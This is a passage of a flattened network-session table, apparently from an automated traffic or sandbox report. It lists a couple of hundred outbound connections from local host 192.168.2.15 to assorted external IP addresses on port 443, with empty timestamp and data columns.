                                            16075192.168.2.1535840144.148.6.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16076192.168.2.1540078139.172.220.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16077192.168.2.153768879.168.226.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16078192.168.2.154398049.208.114.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16079192.168.2.153550235.17.125.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16080192.168.2.1547316160.32.208.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16081192.168.2.154654618.253.58.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16082192.168.2.1555348156.44.191.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16083192.168.2.1556954202.251.201.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16084192.168.2.153332694.9.186.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16085192.168.2.153982632.251.150.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16086192.168.2.1551696119.12.199.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16087192.168.2.1549560206.156.18.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16088192.168.2.1542316108.116.117.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16089192.168.2.1558458199.123.10.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16090192.168.2.1550680166.228.65.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16091192.168.2.15524405.131.95.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16092192.168.2.1544000106.140.132.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16093192.168.2.155232671.172.197.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16094192.168.2.1560640109.93.206.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16095192.168.2.1533020223.202.230.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16096192.168.2.154062491.231.164.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16097192.168.2.153282232.131.210.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16098192.168.2.1549976167.202.16.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16099192.168.2.1547106133.50.241.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16100192.168.2.154683695.251.134.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16101192.168.2.1555144205.161.199.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16102192.168.2.155271877.127.156.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16103192.168.2.1544308101.28.241.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16104192.168.2.1552350183.77.109.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16105192.168.2.153515642.76.60.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16106192.168.2.155084859.188.40.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16107192.168.2.153875487.248.37.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16108192.168.2.154343012.170.132.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16109192.168.2.1555812219.34.237.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16110192.168.2.1544788218.175.148.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16111192.168.2.155642245.74.115.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16112192.168.2.1533494147.166.171.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16113192.168.2.154192425.23.130.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16114192.168.2.1544434167.248.24.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16115192.168.2.1540656192.51.194.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16116192.168.2.1534370161.74.171.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16117192.168.2.1551622218.110.124.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16118192.168.2.1556626134.5.207.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16119192.168.2.155789027.185.208.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16120192.168.2.1550134132.165.15.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16121192.168.2.1558328199.145.23.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16122192.168.2.1548692150.17.244.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16123192.168.2.1535334210.195.229.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16124192.168.2.1555148154.241.143.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16125192.168.2.1553408220.248.219.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16126192.168.2.1545132194.142.204.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16127192.168.2.153297047.8.86.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16128192.168.2.155875423.214.162.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16129192.168.2.153757078.214.185.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16130192.168.2.1560816134.18.10.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16131192.168.2.155236692.68.171.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16132192.168.2.153940047.238.216.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16133192.168.2.1543538217.165.174.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16134192.168.2.1551256160.32.38.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16135192.168.2.155200273.170.248.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16136192.168.2.1556746110.185.14.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16137192.168.2.153948881.133.61.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16138192.168.2.1559970148.192.36.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16139192.168.2.1536620181.87.60.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16140192.168.2.1554274156.42.68.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16141192.168.2.15377361.82.159.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16142192.168.2.1557246100.174.87.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16143192.168.2.153450846.92.248.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16144192.168.2.1560372150.125.85.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16145192.168.2.1556592188.182.5.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16146192.168.2.1559600115.48.21.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16147192.168.2.155608840.111.58.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16148192.168.2.1534558136.108.81.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16149192.168.2.1554640156.182.28.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16150192.168.2.155668495.199.118.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16151192.168.2.1536626155.153.173.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16152192.168.2.155134659.49.187.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16153192.168.2.1545210128.135.66.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16154192.168.2.1541914182.239.201.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16155192.168.2.1550990181.80.33.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16156192.168.2.1552492190.165.131.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16157192.168.2.154473469.158.191.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16158192.168.2.154376450.135.237.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16159192.168.2.1536568141.167.133.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16160192.168.2.1536294144.79.2.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16161192.168.2.155506264.78.183.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16162192.168.2.1545530172.71.244.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16163192.168.2.1538488150.141.155.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16164192.168.2.1558910205.251.229.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16165192.168.2.154277637.42.209.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16166192.168.2.1545392138.89.28.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16167192.168.2.1546056203.88.16.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16168192.168.2.1550136111.43.11.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16169192.168.2.1549858172.239.27.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16170192.168.2.1554166130.137.187.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16171192.168.2.1552032101.144.161.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16172192.168.2.1541192164.32.236.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16173192.168.2.154926014.193.10.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16174192.168.2.155630057.72.105.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16175192.168.2.1560072136.220.28.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16176192.168.2.1549030124.237.130.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16177192.168.2.1546818139.156.198.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16178192.168.2.1557328145.222.178.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16179192.168.2.1548350128.114.164.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16180192.168.2.1540070120.23.147.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16181192.168.2.154944891.26.128.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16182192.168.2.1558688116.229.123.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16183192.168.2.1547774139.219.91.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16184192.168.2.1542198185.90.187.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16185192.168.2.1558982207.155.140.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16186192.168.2.153596298.29.133.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16187192.168.2.1540444143.199.157.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16188192.168.2.1539958112.111.100.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16189192.168.2.1558306124.69.225.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16190192.168.2.1537664129.152.220.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16191192.168.2.155415079.236.129.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16192192.168.2.1535892189.213.237.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16193192.168.2.1538176165.191.31.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16194192.168.2.1559622142.164.132.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16195192.168.2.1544960121.30.249.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16196192.168.2.15546808.88.165.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16197192.168.2.1541768145.208.130.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16198192.168.2.154775044.104.12.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16199192.168.2.1543492140.241.61.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16200192.168.2.1560442112.230.5.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16201192.168.2.153565460.207.4.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16202192.168.2.153350444.26.79.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16203192.168.2.155503251.9.141.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16204192.168.2.156045614.249.184.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16205192.168.2.15403769.135.189.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16206192.168.2.1533054209.227.198.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16207192.168.2.155731027.134.121.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16208192.168.2.153426858.196.96.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16209192.168.2.153915437.251.176.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16210192.168.2.154629634.16.78.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16211192.168.2.1552154112.21.93.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16212192.168.2.153955290.254.166.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16213192.168.2.1551320172.71.28.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16214192.168.2.153373262.144.171.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16215192.168.2.1536418121.16.247.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16216192.168.2.154447434.6.176.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16217192.168.2.153343448.99.191.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16218192.168.2.154050652.114.117.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16219192.168.2.1537218160.226.36.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16220192.168.2.153746880.35.144.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16221192.168.2.1548204188.226.171.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16222192.168.2.1533024195.218.209.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16223192.168.2.1552090188.65.32.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16224192.168.2.153777459.177.83.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16225192.168.2.1540032169.37.208.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16226192.168.2.1532838195.253.69.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16227192.168.2.1547102175.93.80.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16228192.168.2.155885249.124.79.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16229192.168.2.1545978171.88.140.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16230192.168.2.154366080.116.62.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16231192.168.2.153558696.69.89.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16232192.168.2.1557194157.128.92.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16233192.168.2.155666219.250.117.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16234192.168.2.155148493.119.44.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16235192.168.2.1555468197.70.217.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16236192.168.2.1557614145.62.29.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16237192.168.2.153480457.81.111.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16238192.168.2.1552668108.60.213.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16239192.168.2.1537398145.31.146.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16240192.168.2.1557120175.16.120.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16241192.168.2.153354427.145.182.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16242192.168.2.1558324184.226.135.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16243192.168.2.1557950110.235.68.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16244192.168.2.1549136220.108.50.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16245192.168.2.155605025.183.106.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16246192.168.2.1547126109.56.117.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16247192.168.2.1555026119.125.31.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16248192.168.2.155541888.184.110.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16249192.168.2.1534462104.108.51.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16250192.168.2.1557426182.89.30.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16251192.168.2.1554316190.86.252.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16252192.168.2.155212846.25.231.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16253192.168.2.1551378116.22.158.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16254192.168.2.1538708164.202.107.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16255192.168.2.155759023.221.234.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16256192.168.2.1550278155.90.140.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16257192.168.2.155918231.25.97.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16258192.168.2.154340453.105.203.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16259192.168.2.153984442.86.245.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16260192.168.2.155469086.7.96.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16261192.168.2.155234693.184.55.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16262192.168.2.1550986183.210.85.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16263192.168.2.1556930104.250.196.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16264192.168.2.1540088132.48.158.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16265192.168.2.154170484.232.243.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16266192.168.2.1534774126.219.171.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16267192.168.2.1554470139.77.79.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16268192.168.2.154883265.209.31.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16269192.168.2.1550482124.218.10.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16270192.168.2.153354870.47.247.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16271192.168.2.155908842.233.181.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16272192.168.2.153963652.232.93.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16273192.168.2.1541296216.53.116.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16274192.168.2.154553442.78.109.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16275192.168.2.1554126110.59.26.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16276192.168.2.154668090.229.30.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16277192.168.2.153975295.141.214.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16278192.168.2.154826478.247.108.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16279192.168.2.1548396101.212.244.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16280192.168.2.154522279.88.173.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16281192.168.2.1558210218.21.20.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16282192.168.2.1533984219.20.128.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16283192.168.2.154360466.40.117.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16284192.168.2.154252838.64.7.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16285192.168.2.1532804160.212.114.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16286192.168.2.1533170160.97.1.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16287192.168.2.1539406103.105.84.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16288192.168.2.155855851.163.130.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16289192.168.2.155790239.14.27.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16290192.168.2.1560426200.48.76.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16291192.168.2.153560625.204.227.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16292192.168.2.1555426164.11.217.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16293192.168.2.1541428142.247.54.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16294192.168.2.1546418199.209.127.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16295192.168.2.154377069.58.43.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16296192.168.2.154247490.112.48.134443
                                            TimestampBytes transferredDirectionData


